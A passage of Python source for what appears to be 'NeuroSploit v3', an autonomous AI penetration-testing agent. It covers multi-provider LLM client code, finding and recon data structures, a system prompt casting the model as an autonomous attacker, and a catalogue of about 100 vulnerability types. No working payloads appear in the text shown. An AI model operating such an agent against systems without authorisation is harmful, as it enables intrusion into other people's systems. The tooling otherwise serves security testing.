""" NeuroSploit v3 - Autonomous AI Security Agent REAL AI-powered penetration testing agent that: 1. Actually calls Claude/OpenAI API for intelligent analysis 2. Performs comprehensive reconnaissance 3. Tests vulnerabilities with proper verification (no false positives) 4. Generates detailed reports with CVSS, PoC, remediation """ import asyncio import aiohttp import json import re import os import hashlib from typing import Dict, List, Any, Optional, Callable, Tuple from dataclasses import dataclass, field, asdict from datetime import datetime from urllib.parse import urljoin, urlparse, parse_qs, urlencode from enum import Enum from pathlib import Path from backend.core.agent_memory import AgentMemory from backend.core.vuln_engine.registry import VulnerabilityRegistry from backend.core.vuln_engine.payload_generator import PayloadGenerator from backend.core.response_verifier import ResponseVerifier from backend.core.negative_control import NegativeControlEngine from backend.core.proof_of_execution import ProofOfExecution from backend.core.confidence_scorer import ConfidenceScorer from backend.core.validation_judge import ValidationJudge from backend.core.vuln_engine.system_prompts import get_system_prompt, get_prompt_for_vuln_type from backend.core.vuln_engine.ai_prompts import get_verification_prompt, get_poc_prompt from backend.core.access_control_learner import AccessControlLearner try: from backend.core.adaptive_learner import AdaptiveLearner HAS_ADAPTIVE_LEARNER = True except ImportError: HAS_ADAPTIVE_LEARNER = False AdaptiveLearner = None from backend.core.request_engine import RequestEngine, ErrorType from backend.core.waf_detector import WAFDetector from backend.core.strategy_adapter import StrategyAdapter from backend.core.chain_engine import ChainEngine from backend.core.auth_manager import AuthManager # Phase 1: Reasoning + Budget + Tasks try: from backend.core.token_budget import TokenBudget HAS_TOKEN_BUDGET = True except ImportError: HAS_TOKEN_BUDGET = False TokenBudget = None try: from backend.core.reasoning_engine import ReasoningEngine HAS_REASONING = True except ImportError: HAS_REASONING = False ReasoningEngine = None try: from backend.core.agent_tasks import AgentTaskManager, create_test_task HAS_AGENT_TASKS = True except ImportError: HAS_AGENT_TASKS = False AgentTaskManager = None # Phase 2: Enumeration + Intelligence try: from backend.core.endpoint_classifier import EndpointClassifier HAS_ENDPOINT_CLASSIFIER = True except ImportError: HAS_ENDPOINT_CLASSIFIER = False EndpointClassifier = None try: from backend.core.cve_hunter import CVEHunter HAS_CVE_HUNTER = True except ImportError: HAS_CVE_HUNTER = False CVEHunter = None try: from backend.core.deep_recon import DeepRecon HAS_DEEP_RECON = True except ImportError: HAS_DEEP_RECON = False DeepRecon = None try: from backend.core.banner_analyzer import BannerAnalyzer HAS_BANNER_ANALYZER = True except ImportError: HAS_BANNER_ANALYZER = False BannerAnalyzer = None # Phase 3: Testing + Payload Intelligence try: from backend.core.payload_mutator import PayloadMutator HAS_PAYLOAD_MUTATOR = True except ImportError: HAS_PAYLOAD_MUTATOR = False PayloadMutator = None try: from backend.core.param_analyzer import ParameterAnalyzer HAS_PARAM_ANALYZER = True except ImportError: HAS_PARAM_ANALYZER = False ParameterAnalyzer = None try: from backend.core.xss_validator import XSSValidator HAS_XSS_VALIDATOR = True except ImportError: HAS_XSS_VALIDATOR = False XSSValidator = None # Phase 3.5: Request Repeater + Site Analyzer try: from backend.core.request_repeater import RequestRepeater HAS_REQUEST_REPEATER = True except ImportError: HAS_REQUEST_REPEATER = False RequestRepeater = None try: from backend.core.site_analyzer import SiteAnalyzer HAS_SITE_ANALYZER = True except ImportError: HAS_SITE_ANALYZER = False SiteAnalyzer = None # Phase 4: Exploit Generation + Validation try: from backend.core.exploit_generator import ExploitGenerator HAS_EXPLOIT_GENERATOR = True except ImportError: HAS_EXPLOIT_GENERATOR = False ExploitGenerator = None try: from backend.core.poc_validator import PoCValidator HAS_POC_VALIDATOR = True except ImportError: HAS_POC_VALIDATOR = False PoCValidator = None # Phase 5: Multi-Agent Orchestration try: from backend.core.agent_orchestrator import AgentOrchestrator HAS_MULTI_AGENT = True except ImportError: HAS_MULTI_AGENT = False AgentOrchestrator = None # Researcher AI Agent (0-day discovery with Kali sandbox) try: from backend.core.researcher_agent import ResearcherAgent HAS_RESEARCHER = True except ImportError: HAS_RESEARCHER = False ResearcherAgent = None # CLI Agent Runner (AI CLI tools inside Kali sandbox) try: from backend.core.cli_agent_runner import CLIAgentRunner HAS_CLI_AGENT = True except ImportError: HAS_CLI_AGENT = False CLIAgentRunner = None # Phase 5.5: Markdown-based Agent Orchestration (post-recon agent dispatch) try: from backend.core.md_agent import MdAgentOrchestrator HAS_MD_AGENTS = True except ImportError: HAS_MD_AGENTS = False MdAgentOrchestrator = None # Phase 6: Per-Vulnerability-Type Agent Orchestration try: from backend.core.vuln_orchestrator import VulnOrchestrator HAS_VULN_AGENTS = True except ImportError: HAS_VULN_AGENTS = False VulnOrchestrator = None # Phase 7: Checkpoint persistence for crash-resilient resume try: from backend.core.checkpoint_manager import CheckpointManager HAS_CHECKPOINT = True except ImportError: HAS_CHECKPOINT = False CheckpointManager = None # Phase 8: Smart Router (multi-provider failover) try: from backend.core.smart_router import get_router, HAS_SMART_ROUTER except ImportError: HAS_SMART_ROUTER = False get_router = None try: from core.browser_validator import BrowserValidator, embed_screenshot, HAS_PLAYWRIGHT except ImportError: HAS_PLAYWRIGHT = False BrowserValidator = None embed_screenshot = None # Try to import anthropic for Claude API try: import anthropic ANTHROPIC_AVAILABLE = True except ImportError: ANTHROPIC_AVAILABLE = False anthropic = None # Try to import openai try: import openai OPENAI_AVAILABLE = True except ImportError: OPENAI_AVAILABLE = False openai = None # Phase 9: RAG Engine (semantic retrieval, few-shot examples, reasoning templates) try: from backend.core.rag import RAGEngine, FewShotSelector, ReasoningMemory, ReasoningTrace, FailureRecord from backend.core.rag.reasoning_templates import format_reasoning_prompt HAS_RAG = True except ImportError: HAS_RAG = False RAGEngine = None FewShotSelector = None ReasoningMemory = None # Pentest Playbook (100 vuln-type testing methodologies) try: from backend.core.vuln_engine.pentest_playbook import ( get_playbook_entry, get_testing_prompts, get_bypass_strategies, get_verification_checklist, build_agent_testing_prompt, get_anti_fp_rules, get_chain_attacks, get_playbook_summary, ) HAS_PLAYBOOK = True except ImportError: HAS_PLAYBOOK = False # Security sandbox (Docker-based real tools) try: from core.sandbox_manager import get_sandbox, SandboxManager HAS_SANDBOX = True except ImportError: HAS_SANDBOX = False class OperationMode(Enum): """Agent operation modes""" RECON_ONLY = "recon_only" FULL_AUTO = "full_auto" PROMPT_ONLY = "prompt_only" ANALYZE_ONLY = "analyze_only" AUTO_PENTEST = "auto_pentest" CLI_AGENT = "cli_agent" FULL_LLM_PENTEST = "full_llm_pentest" class FindingSeverity(Enum): CRITICAL = "critical" HIGH = "high" MEDIUM = "medium" LOW = "low" INFO = "info" @dataclass class CVSSScore: """CVSS 3.1 Score""" score: float severity: str vector: str @dataclass class Finding: """Vulnerability finding with full details""" id: str title: str severity: str vulnerability_type: str = "" cvss_score: float = 0.0 cvss_vector: str = "" cwe_id: str = "" description: str = "" affected_endpoint: str = "" parameter: str = "" payload: str = "" evidence: str = "" request: str = "" response: str = "" impact: str = "" poc_code: str = "" remediation: str = "" references: List[str] = field(default_factory=list) screenshots: List[str] = field(default_factory=list) affected_urls: List[str] = field(default_factory=list) ai_verified: bool = False confidence: str = "0" # Numeric string "0"-"100" confidence_score: int = 0 # Numeric confidence score 0-100 confidence_breakdown: Dict = field(default_factory=dict) # Scoring breakdown proof_of_execution: str = "" # What proof was found negative_controls: str = "" # Control test results ai_status: str = "confirmed" # "confirmed" | "rejected" | "pending" rejection_reason: str = "" double_checked: bool = False evidence_request: str = "" # Full HTTP request for report evidence evidence_response: str = "" # Full HTTP response for report evidence @dataclass class ReconData: """Reconnaissance data""" subdomains: List[str] = field(default_factory=list) live_hosts: List[str] = field(default_factory=list) endpoints: List[Dict] = field(default_factory=list) parameters: Dict[str, List[str]] = field(default_factory=dict) technologies: List[str] = field(default_factory=list) forms: List[Dict] = field(default_factory=list) js_files: List[str] = field(default_factory=list) api_endpoints: List[str] = field(default_factory=list) def _get_endpoint_url(ep) -> str: """Safely get URL from endpoint (handles both str and dict)""" if isinstance(ep, str): return ep elif isinstance(ep, dict): return ep.get("url", "") return "" def _get_endpoint_method(ep) -> str: """Safely get method from endpoint""" if isinstance(ep, dict): return ep.get("method", "GET") return "GET" class LLMClient: """Unified LLM client for Claude, OpenAI, Ollama, and Gemini""" # Ollama and LM Studio endpoints OLLAMA_URL = os.getenv("OLLAMA_URL", "http://localhost:11434") LMSTUDIO_URL = os.getenv("LMSTUDIO_URL", "http://localhost:1234") GEMINI_URL = "https://generativelanguage.googleapis.com/v1beta" def __init__(self, preferred_provider: Optional[str] = None, preferred_model: Optional[str] = None): self.anthropic_key = os.getenv("ANTHROPIC_API_KEY", "") self.openai_key = os.getenv("OPENAI_API_KEY", "") self.google_key = os.getenv("GEMINI_API_KEY", "") or os.getenv("GOOGLE_API_KEY", "") self.together_key = os.getenv("TOGETHER_API_KEY", "") self.fireworks_key = os.getenv("FIREWORKS_API_KEY", "") self.openrouter_key = os.getenv("OPENROUTER_API_KEY", "") self.azure_openai_key = os.getenv("AZURE_OPENAI_API_KEY", "") self.azure_openai_endpoint = os.getenv("AZURE_OPENAI_ENDPOINT", "") self.azure_openai_api_version = os.getenv("AZURE_OPENAI_API_VERSION", "2024-02-01") self.azure_openai_deployment = os.getenv("AZURE_OPENAI_DEPLOYMENT", "") self.codex_key = os.getenv("CODEX_API_KEY", "") self.ollama_model = os.getenv("OLLAMA_MODEL", "llama3.2") self.configured_model = os.getenv("DEFAULT_LLM_MODEL", "") # User-configured model name self.client = None self.provider = None self.model_name = None # Actual model name being used self.error_message = None self.connection_tested = False self._smart_router = None self._preferred_provider = preferred_provider # User-selected provider for SmartRouter self._preferred_model = preferred_model # User-selected model for SmartRouter # Try SmartRouter first (multi-provider failover) if HAS_SMART_ROUTER and get_router: router = get_router() if router: self._smart_router = router self.provider = "smart_router" self.client = "smart_router" if preferred_provider and preferred_model: self.model_name = f"{preferred_provider}/{preferred_model}" elif preferred_model: self.model_name = preferred_model elif preferred_provider: self.model_name = f"{preferred_provider} (auto)" else: self.model_name = "auto" print(f"[LLM] SmartRouter active (provider={preferred_provider or 'auto'}, model={preferred_model or 'auto'})") return # Validate keys are not placeholder values if self.anthropic_key in ["", "your-anthropic-api-key"]: self.anthropic_key = None if self.openai_key in ["", "your-openai-api-key"]: self.openai_key = None if self.google_key in ["", "your-google-api-key"]: self.google_key = None if self.together_key in ["", "your-together-api-key"]: self.together_key = None if self.fireworks_key in ["", "your-fireworks-api-key"]: self.fireworks_key = None if self.openrouter_key in ["", "your-openrouter-api-key"]: self.openrouter_key = None if self.codex_key in ["", "your-codex-api-key"]: self.codex_key = None if self.azure_openai_key in ["", "your-azure-openai-api-key"]: self.azure_openai_key = None # Try providers in order of preference self._initialize_provider() def _initialize_provider(self): """Initialize the first available LLM provider""" # 1. Try Claude (Anthropic) if ANTHROPIC_AVAILABLE and self.anthropic_key: try: self.client = anthropic.Anthropic(api_key=self.anthropic_key) self.provider = "claude" self.model_name = self.configured_model or "claude-sonnet-4-20250514" print(f"[LLM] Claude API initialized (model: {self.model_name})") return except Exception as e: self.error_message = f"Claude init error: {e}" print(f"[LLM] Claude initialization failed: {e}") # 2. Try OpenAI if OPENAI_AVAILABLE and self.openai_key: try: self.client = openai.OpenAI(api_key=self.openai_key) self.provider = "openai" self.model_name = self.configured_model or "gpt-4o" print(f"[LLM] OpenAI API initialized (model: {self.model_name})") return except Exception as e: self.error_message = f"OpenAI init error: {e}" print(f"[LLM] OpenAI initialization failed: {e}") # 2a. Try Azure OpenAI if OPENAI_AVAILABLE and self.azure_openai_key and self.azure_openai_endpoint: try: self.client = openai.AzureOpenAI( api_key=self.azure_openai_key, api_version=self.azure_openai_api_version, azure_endpoint=self.azure_openai_endpoint, ) self.provider = "azure_openai" self.model_name = self.azure_openai_deployment or self.configured_model or "gpt-4o" print(f"[LLM] Azure OpenAI initialized (deployment: {self.model_name})") return except Exception as e: self.error_message = f"Azure OpenAI init error: {e}" print(f"[LLM] Azure OpenAI initialization failed: {e}") # 2b. Try Codex (OpenAI-compatible) if OPENAI_AVAILABLE and self.codex_key: try: self.client = openai.OpenAI(api_key=self.codex_key) self.provider = "codex" self.model_name = self.configured_model or "codex-mini-latest" print(f"[LLM] Codex API initialized (model: {self.model_name})") return except Exception as e: self.error_message = f"Codex init error: {e}" print(f"[LLM] Codex initialization failed: {e}") # 3. Try Google Gemini if self.google_key: self.client = "gemini" # Placeholder - uses HTTP requests self.provider = "gemini" self.model_name = self.configured_model or "gemini-pro" print(f"[LLM] Gemini API initialized (model: {self.model_name})") return # 4. Try OpenRouter (multi-model gateway) if self.openrouter_key: self.client = "openrouter" self.provider = "openrouter" self.model_name = self.configured_model or "anthropic/claude-sonnet-4-20250514" print(f"[LLM] OpenRouter API initialized (model: {self.model_name})") return # 5. Try Together AI if self.together_key: self.client = "together" self.provider = "together" self.model_name = self.configured_model or "meta-llama/Llama-3.3-70B-Instruct-Turbo" print(f"[LLM] Together AI initialized (model: {self.model_name})") return # 6. Try Fireworks AI if self.fireworks_key: self.client = "fireworks" self.provider = "fireworks" self.model_name = self.configured_model or "accounts/fireworks/models/llama-v3p3-70b-instruct" print(f"[LLM] Fireworks AI initialized (model: {self.model_name})") return # 7. Try Ollama (local) if self._check_ollama(): self.client = "ollama" # Placeholder - uses HTTP requests self.provider = "ollama" self.model_name = self.configured_model or self.ollama_model print(f"[LLM] Ollama initialized with model: {self.model_name}") return # 8. Try LM Studio (local) if self._check_lmstudio(): self.client = "lmstudio" # Placeholder - uses HTTP requests self.provider = "lmstudio" self.model_name = self.configured_model or "" print("[LLM] LM Studio initialized") return # No provider available self._set_no_provider_error() def _check_ollama(self) -> bool: """Check if Ollama is running locally""" try: import requests response = requests.get(f"{self.OLLAMA_URL}/api/tags", timeout=2) return response.status_code == 200 except Exception: return False def _check_lmstudio(self) -> bool: """Check if LM Studio is running locally""" try: import requests response = requests.get(f"{self.LMSTUDIO_URL}/v1/models", timeout=2) return response.status_code == 200 except Exception: return False def _set_no_provider_error(self): """Set appropriate error message when no provider is available""" errors = [] if not ANTHROPIC_AVAILABLE and not OPENAI_AVAILABLE: errors.append("LLM libraries not installed (run: pip install anthropic openai)") all_keys = [self.anthropic_key, self.openai_key, self.google_key, self.openrouter_key, self.together_key, self.fireworks_key, self.codex_key] if not any(all_keys): errors.append("No API keys configured (set ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENROUTER_API_KEY, GEMINI_API_KEY, TOGETHER_API_KEY, or FIREWORKS_API_KEY)") if not self._check_ollama(): errors.append("Ollama not running locally") if not self._check_lmstudio(): errors.append("LM Studio not running locally") self.error_message = "No LLM provider available. " + "; ".join(errors) print(f"[LLM] WARNING: {self.error_message}") def is_available(self) -> bool: return self.client is not None or self._smart_router is not None def get_status(self) -> dict: """Get LLM status for debugging""" status = { "available": self.is_available(), "provider": self.provider, "model": self.model_name, "preferred_provider": self._preferred_provider, "preferred_model": self._preferred_model, "error": self.error_message, "anthropic_lib": ANTHROPIC_AVAILABLE, "openai_lib": OPENAI_AVAILABLE, "ollama_available": self._check_ollama(), "lmstudio_available": self._check_lmstudio(), "has_google_key": bool(self.google_key), "has_together_key": bool(self.together_key), "has_fireworks_key": bool(self.fireworks_key), "has_openrouter_key": bool(self.openrouter_key), "has_codex_key": bool(self.codex_key), "smart_router_enabled": self._smart_router is not None, } if self._smart_router: status["smart_router_status"] = self._smart_router.get_status() return status async def test_connection(self) -> Tuple[bool, str]: """Test if the API connection is working""" if not self.client: return False, self.error_message or "No LLM client configured" try: # Simple test prompt result = await self.generate("Say 'OK' if you can hear me.", max_tokens=10) if result: self.connection_tested = True return True, f"Connected to {self.provider}" return False, f"Empty response from {self.provider}" except Exception as e: return False, f"Connection test failed for {self.provider}: {str(e)}" async def generate(self, prompt: str, system: str = "", max_tokens: int = 4096) -> str: """Generate response from LLM""" if not self.client: raise LLMConnectionError(self.error_message or "No LLM provider available") default_system = "You are an expert penetration tester and security researcher. Provide accurate, technical, and actionable security analysis. Be precise and avoid false positives." # SmartRouter delegation with fallback if self._smart_router: try: result = await self._smart_router.generate( prompt=prompt, system=system or default_system, max_tokens=max_tokens, preferred_provider=self._preferred_provider, model=self._preferred_model, ) # Update model_name with what was actually used if self._smart_router._last_provider: new_name = f"{self._smart_router._last_provider}/{self._smart_router._last_model}" if new_name != self.model_name: self.model_name = new_name print(f"[LLM] Using: {self._smart_router._last_account_label} → {new_name}") return result except Exception as e: print(f"[LLM] SmartRouter failed, falling back to direct: {e}") # Fall through to direct provider logic if available if not self.anthropic_key and not self.openai_key and not self.google_key: raise LLMConnectionError(f"SmartRouter failed and no direct provider: {e}") try: if self.provider == "claude": message = self.client.messages.create( model=self.model_name or "claude-sonnet-4-20250514", max_tokens=max_tokens, system=system or default_system, messages=[{"role": "user", "content": prompt}] ) return message.content[0].text elif self.provider == "openai": response = self.client.chat.completions.create( model=self.model_name or "gpt-4o", max_tokens=max_tokens, messages=[ {"role": "system", "content": system or default_system}, {"role": "user", "content": prompt} ] ) return response.choices[0].message.content elif self.provider == "codex": response = self.client.chat.completions.create( model=self.model_name or "codex-mini-latest", max_tokens=max_tokens, messages=[ {"role": "system", "content": system or default_system}, {"role": "user", "content": prompt} ] ) return response.choices[0].message.content elif self.provider == "azure_openai": response = self.client.chat.completions.create( model=self.model_name or "gpt-4o", max_tokens=max_tokens, messages=[ {"role": "system", "content": system or default_system}, {"role": "user", "content": prompt} ] ) return response.choices[0].message.content elif self.provider == "gemini": return await self._generate_gemini(prompt, system or default_system, max_tokens) elif self.provider == "openrouter": return await self._generate_openai_compatible( prompt, system or default_system, max_tokens, url="https://openrouter.ai/api/v1/chat/completions", api_key=self.openrouter_key, model=self.model_name or "anthropic/claude-sonnet-4-20250514", extra_headers={"HTTP-Referer": "https://neurosploit.ai", "X-Title": "NeuroSploit"}, ) elif self.provider == "together": return await self._generate_openai_compatible( prompt, system or default_system, max_tokens, url="https://api.together.xyz/v1/chat/completions", api_key=self.together_key, model=self.model_name or "meta-llama/Llama-3.3-70B-Instruct-Turbo", ) elif self.provider == "fireworks": return await self._generate_openai_compatible( prompt, system or default_system, max_tokens, url="https://api.fireworks.ai/inference/v1/chat/completions", api_key=self.fireworks_key, model=self.model_name or "accounts/fireworks/models/llama-v3p3-70b-instruct", ) elif self.provider == "ollama": return await self._generate_ollama(prompt, system or default_system) elif self.provider == "lmstudio": return await self._generate_lmstudio(prompt, system or default_system, max_tokens) except LLMConnectionError: raise except Exception as e: error_msg = str(e) print(f"[LLM] Error from {self.provider}: {error_msg}") raise LLMConnectionError(f"API call failed ({self.provider}): {error_msg}") return "" async def _generate_openai_compatible( self, prompt: str, system: str, max_tokens: int, url: str = "", api_key: str = "", model: str = "", extra_headers: dict = None, ) -> str: """Generate using any OpenAI-compatible API (OpenRouter, Together, Fireworks).""" import aiohttp headers = { "Authorization": f"Bearer {api_key}", "Content-Type": "application/json", } if extra_headers: headers.update(extra_headers) payload = { "model": model, "messages": [ {"role": "system", "content": system}, {"role": "user", "content": prompt} ], "max_tokens": max_tokens, } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, headers=headers, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"API error ({response.status}): {error_text[:500]}") data = await response.json() return data.get("choices", [{}])[0].get("message", {}).get("content", "") async def _generate_gemini(self, prompt: str, system: str, max_tokens: int) -> str: """Generate using Google Gemini API""" import aiohttp gemini_model = self.model_name or "gemini-pro" url = f"{self.GEMINI_URL}/models/{gemini_model}:generateContent?key={self.google_key}" payload = { "contents": [{"parts": [{"text": f"{system}\n\n{prompt}"}]}], "generationConfig": {"maxOutputTokens": max_tokens} } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=60)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"Gemini API error ({response.status}): {error_text}") data = await response.json() return data.get("candidates", [{}])[0].get("content", {}).get("parts", [{}])[0].get("text", "") async def _generate_ollama(self, prompt: str, system: str) -> str: """Generate using local Ollama""" import aiohttp url = f"{self.OLLAMA_URL}/api/generate" payload = { "model": self.model_name or self.ollama_model, "prompt": prompt, "system": system, "stream": False } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"Ollama error ({response.status}): {error_text}") data = await response.json() return data.get("response", "") async def _generate_lmstudio(self, prompt: str, system: str, max_tokens: int) -> str: """Generate using LM Studio (OpenAI-compatible)""" import aiohttp url = f"{self.LMSTUDIO_URL}/v1/chat/completions" payload = { "messages": [ {"role": "system", "content": system}, {"role": "user", "content": prompt} ], "max_tokens": max_tokens, "stream": False } async with aiohttp.ClientSession() as session: async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response: if response.status != 200: error_text = await response.text() raise LLMConnectionError(f"LM Studio error ({response.status}): {error_text}") data = await response.json() return data.get("choices", [{}])[0].get("message", {}).get("content", "") class LLMConnectionError(Exception): """Exception raised when LLM connection fails""" pass DEFAULT_ASSESSMENT_PROMPT = """You are NeuroSploit, an elite autonomous penetration testing AI agent. Your mission: identify real, exploitable vulnerabilities — zero false positives. ## METHODOLOGY (PTES/OWASP/WSTG aligned) ### Phase 1 — Reconnaissance & Fingerprinting - Discover all endpoints, parameters, forms, API paths, WebSocket URLs - Technology fingerprinting: language, framework, server, WAF, CDN - Identify attack surface: file upload, auth endpoints, admin panels, GraphQL ### Phase 2 — Technology-Guided Prioritization Select vulnerability types based on detected technology stack: - PHP/Laravel → LFI, command injection, SSTI (Blade), SQLi, file upload - Node.js/Express → NoSQL injection, SSRF, prototype pollution, SSTI (EJS/Pug) - Python/Django/Flask → SSTI (Jinja2), command injection, IDOR, mass assignment - Java/Spring → XXE, insecure deserialization, expression language injection, SSRF - ASP.NET → path traversal, XXE, header injection, insecure deserialization - API/REST → IDOR, BOLA, BFLA, JWT manipulation, mass assignment, rate limiting - GraphQL → introspection, injection, DoS via nested queries - WordPress → file upload, SQLi, XSS, exposed admin, plugin vulns ### Phase 3 — Active Testing (100 vuln types available) **OWASP Top 10 2021 coverage:** - A01 Broken Access Control: IDOR, BOLA, BFLA, privilege escalation, forced browsing, CORS - A02 Cryptographic Failures: weak encryption/hashing, cleartext transmission, SSL issues - A03 Injection: SQLi (error/union/blind/time), NoSQL, LDAP, XPath, command, SSTI, XSS, XXE - A04 Insecure Design: business logic, race condition, mass assignment - A05 Security Misconfiguration: headers, debug mode, directory listing, default creds - A06 Vulnerable Components: outdated dependencies, insecure CDN - A07 Auth Failures: JWT, session fixation, brute force, 2FA bypass, OAuth misconfig - A08 Data Integrity: insecure deserialization, cache poisoning, HTTP smuggling - A09 Logging Failures: log injection, improper error handling - A10 SSRF: standard SSRF, cloud metadata SSRF ### Phase 4 — Verification (multi-signal) Every finding MUST have: 1. Concrete HTTP evidence (request + response) 2. At least 2 verification signals OR high-confidence tester match 3. No speculative language — only confirmed exploitable issues 4. Screenshot capture when possible ### Phase 5 — Reporting - Each finding: title, severity, CVSS 3.1, CWE, PoC, impact, remediation - Prioritized by real-world exploitability - Executive summary with risk rating ## CRITICAL RULES - NEVER report theoretical/speculative vulnerabilities - ALWAYS verify with real HTTP evidence before confirming - Test systematically: every parameter, every endpoint, every form - Use technology hints to select the most relevant tests - Capture baseline responses before testing for accurate diff-based detection """ class AutonomousAgent: """ AI-Powered Autonomous Security Agent Performs real security testing with AI-powered analysis """ # Legacy vuln type → registry key mapping VULN_TYPE_MAP = { # Aliases → canonical registry keys "sqli": "sqli_error", "xss": "xss_reflected", "rce": "command_injection", "cors": "cors_misconfig", "lfi_rfi": "lfi", "file_inclusion": "lfi", "remote_code_execution": "command_injection", "broken_auth": "auth_bypass", "broken_access": "bola", "api_abuse": "rest_api_versioning", # Identity mappings — Injection (18) "sqli_error": "sqli_error", "sqli_union": "sqli_union", "sqli_blind": "sqli_blind", "sqli_time": "sqli_time", "command_injection": "command_injection", "ssti": "ssti", "nosql_injection": "nosql_injection", "ldap_injection": "ldap_injection", "xpath_injection": "xpath_injection", "graphql_injection": "graphql_injection", "crlf_injection": "crlf_injection", "header_injection": "header_injection", "email_injection": "email_injection", "expression_language_injection": "expression_language_injection", "log_injection": "log_injection", "html_injection": "html_injection", "csv_injection": "csv_injection", "orm_injection": "orm_injection", # XSS (5) "xss_reflected": "xss_reflected", "xss_stored": "xss_stored", "xss_dom": "xss_dom", "blind_xss": "blind_xss", "mutation_xss": "mutation_xss", # File Access (8) "lfi": "lfi", "rfi": "rfi", "path_traversal": "path_traversal", "xxe": "xxe", "file_upload": "file_upload", "arbitrary_file_read": "arbitrary_file_read", "arbitrary_file_delete": "arbitrary_file_delete", "zip_slip": "zip_slip", # Request Forgery (4) "ssrf": "ssrf", "ssrf_cloud": "ssrf_cloud", "csrf": "csrf", "cors_misconfig": "cors_misconfig", # Auth (8) "auth_bypass": "auth_bypass", "jwt_manipulation": "jwt_manipulation", "session_fixation": "session_fixation", "weak_password": "weak_password", "default_credentials": "default_credentials", "brute_force": "brute_force", "two_factor_bypass": "two_factor_bypass", "oauth_misconfiguration": "oauth_misconfiguration", # Authorization (6) "idor": "idor", "bola": "bola", "bfla": "bfla", "privilege_escalation": "privilege_escalation", "mass_assignment": "mass_assignment", "forced_browsing": "forced_browsing", # Client-Side (8) "clickjacking": "clickjacking", "open_redirect": "open_redirect", "dom_clobbering": "dom_clobbering", "postmessage_vulnerability": "postmessage_vulnerability", "websocket_hijacking": "websocket_hijacking", "prototype_pollution": "prototype_pollution", "css_injection": "css_injection", "tabnabbing": "tabnabbing", # Infrastructure (10) "security_headers": "security_headers", "ssl_issues": "ssl_issues", "http_methods": "http_methods", "directory_listing": "directory_listing", "debug_mode": "debug_mode", "exposed_admin_panel": "exposed_admin_panel", "exposed_api_docs": "exposed_api_docs", "insecure_cookie_flags": "insecure_cookie_flags", "http_smuggling": "http_smuggling", "cache_poisoning": "cache_poisoning", # Logic & Data (16) "race_condition": "race_condition", "business_logic": "business_logic", "rate_limit_bypass": "rate_limit_bypass", "parameter_pollution": "parameter_pollution", "type_juggling": "type_juggling", "insecure_deserialization": "insecure_deserialization", "subdomain_takeover": "subdomain_takeover", "host_header_injection": "host_header_injection", "timing_attack": "timing_attack", "improper_error_handling": "improper_error_handling", "sensitive_data_exposure": "sensitive_data_exposure", "information_disclosure": "information_disclosure", "api_key_exposure": "api_key_exposure", "source_code_disclosure": "source_code_disclosure", "backup_file_exposure": "backup_file_exposure", "version_disclosure": "version_disclosure", # Crypto & Supply (8) "weak_encryption": "weak_encryption", "weak_hashing": "weak_hashing", "weak_random": "weak_random", "cleartext_transmission": "cleartext_transmission", "vulnerable_dependency": "vulnerable_dependency", "outdated_component": "outdated_component", "insecure_cdn": "insecure_cdn", "container_escape": "container_escape", # Cloud & API (9) "s3_bucket_misconfiguration": "s3_bucket_misconfiguration", "cloud_metadata_exposure": "cloud_metadata_exposure", "serverless_misconfiguration": "serverless_misconfiguration", "graphql_introspection": "graphql_introspection", "graphql_dos": "graphql_dos", "rest_api_versioning": "rest_api_versioning", "soap_injection": "soap_injection", "api_rate_limiting": "api_rate_limiting", "excessive_data_exposure": "excessive_data_exposure", } def __init__( self, target: str, mode: OperationMode = OperationMode.FULL_AUTO, log_callback: Optional[Callable] = None, progress_callback: Optional[Callable] = None, auth_headers: Optional[Dict] = None, task: Optional[Any] = None, custom_prompt: Optional[str] = None, recon_context: Optional[Dict] = None, finding_callback: Optional[Callable] = None, lab_context: Optional[Dict] = None, scan_id: Optional[str] = None, enable_kali_sandbox: bool = False, loaded_custom_prompts: Optional[List[Dict]] = None, preferred_provider: Optional[str] = None, preferred_model: Optional[str] = None, methodology_file: Optional[str] = None, enable_cli_agent: bool = False, cli_agent_provider: Optional[str] = None, selected_md_agents: Optional[List[str]] = None, ): self.target = self._normalize_target(target) self.mode = mode self.log = log_callback or self._default_log self.progress_callback = progress_callback self.finding_callback = finding_callback self.auth_headers = auth_headers or {} self.task = task self.custom_prompt = custom_prompt self.recon_context = recon_context self.lab_context = lab_context or {} self.scan_id = scan_id self.enable_kali_sandbox = enable_kali_sandbox self.loaded_custom_prompts: List[Dict] = loaded_custom_prompts or [] self.preferred_provider = preferred_provider self.preferred_model = preferred_model self.enable_cli_agent = enable_cli_agent self.cli_agent_provider = cli_agent_provider self.selected_md_agents: Optional[List[str]] = selected_md_agents self._cancelled = False self._paused = False self._skip_to_phase: Optional[str] = None # Phase skip target self.session: Optional[aiohttp.ClientSession] = None self.llm = LLMClient( preferred_provider=preferred_provider, preferred_model=preferred_model, ) # VulnEngine integration (100 types, 428 payloads, 100 testers) self.vuln_registry = VulnerabilityRegistry() self.payload_generator = PayloadGenerator() self.response_verifier = ResponseVerifier() self.knowledge_base = self._load_knowledge_base() # PoC generator for confirmed findings from backend.core.poc_generator import PoCGenerator self.poc_generator = PoCGenerator() # Validation pipeline: negative controls + proof of execution + confidence scoring self.negative_controls = NegativeControlEngine() self.proof_engine = ProofOfExecution() self.confidence_scorer = ConfidenceScorer() self.validation_judge = ValidationJudge( self.negative_controls, self.proof_engine, self.confidence_scorer, self.llm, access_control_learner=getattr(self, 'access_control_learner', None) ) # Execution history for cross-scan learning try: from backend.core.execution_history import ExecutionHistory self.execution_history = ExecutionHistory() except Exception: self.execution_history = None # Access control learning engine (adapts from BOLA/BFLA/IDOR outcomes) try: self.access_control_learner = AccessControlLearner() except Exception: self.access_control_learner = None # Adaptive learner (cross-scan TP/FP feedback learning) self.adaptive_learner = None if HAS_ADAPTIVE_LEARNER: try: self.adaptive_learner = AdaptiveLearner() except Exception: pass # RAG Engine: semantic retrieval + few-shot examples + reasoning memory self.rag_engine = None self.few_shot_selector = None self.reasoning_memory = None if HAS_RAG and os.getenv("ENABLE_RAG", 